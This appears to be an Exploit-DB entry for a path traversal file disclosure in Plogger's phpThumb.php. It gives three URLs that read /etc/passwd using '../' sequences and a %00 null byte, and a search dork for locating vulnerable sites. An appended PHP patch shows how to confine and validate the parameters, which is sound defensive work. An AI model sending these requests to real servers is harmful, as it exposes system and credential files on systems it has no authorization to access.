
Plogger - Remote File Disclosure

Author: Mr.tro0oqy
type: webapps
platform: php
port: 
date_added: 2010-08-13 
date_updated: 2010-09-08 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.complogger-1.0RC1.zip

# Plogger Remote File Disclosure Vulnerability
# http://www.plogger.org/
# dork : Powered by Plogger!
# author: Mr.tro0oqy (yemeni hacker)
# email : t.4@windowslive.com

Exploit:

Line 117:   if ($fp_source = @fopen($_GET['src'],'rb'))

www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?src=../../../../../../../../etc/passwd%00

Line 41: 	$_GET['w'] = $matches[1];
Line 42: 	$_GET['h'] = $matches[2];

www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?w=../../../../../../../../../etc/passwd%00

www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?h=../../../../../../../../../etc/passwd%00
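The check a defender would put in place of the quoted `fopen($_GET['src'],'rb')` call and the raw `w`/`h` assignments, as an added example that is not Plogger's or phpThumb's own code; the images directory and the helper names are assumptions:

```php
<?php
// Added example (not Plogger/phpThumb code). Confines the thumbnail source to
// one directory and forces the dimensions to bounded integers.

/**
 * Resolve a user-supplied image path to a file inside $baseDir, or return null.
 * Rejects null bytes, absolute paths, stream wrappers and anything that
 * resolves outside $baseDir after "../" segments are collapsed.
 */
function resolve_thumb_source(string $userPath, string $baseDir): ?string
{
    // A "%00" in the query string arrives here as a literal NUL byte; PHP
    // before 5.3.4 truncated the path at it, so reject it outright.
    if ($userPath === '' || strpos($userPath, "\0") !== false) {
        return null;
    }
    // Only a relative file name is acceptable: no leading "/" and no
    // scheme such as "php://" or "http://".
    if ($userPath[0] === '/' || preg_match('#^[a-z][a-z0-9+.-]*://#i', $userPath)) {
        return null;
    }
    $base      = realpath($baseDir);
    $candidate = realpath($baseDir . DIRECTORY_SEPARATOR . $userPath);
    if ($base === false || $candidate === false) {
        return null;                       // base missing or file does not exist
    }
    // realpath() resolved every "../", so a traversal now lies outside $base.
    if (strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    // Serve only genuine image files, never arbitrary readable files.
    return @getimagesize($candidate) === false ? null : $candidate;
}

/** Clamp a requested width/height to an integer in [1, $max]; 0 means "unset". */
function thumb_dimension($value, int $max = 4096): int
{
    $n = filter_var($value, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1, 'max_range' => $max]]);
    return $n === false ? 0 : $n;
}

// Replacement for the quoted lines (images directory is an assumption):
$imagesDir = __DIR__ . '/../../../images';
$src = resolve_thumb_source((string)($_GET['src'] ?? ''), $imagesDir);
if ($src === null) {
    header('HTTP/1.0 400 Bad Request');
    exit;
}
$w = thumb_dimension($_GET['w'] ?? 0);
$h = thumb_dimension($_GET['h'] ?? 0);
$fp_source = fopen($src, 'rb');
```

With this in place every traversal URL shown above yields a 400 rather than file contents, and the `w`/`h` values can no longer carry anything but a bounded integer.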


greetz : all muslems (ramadan kreem)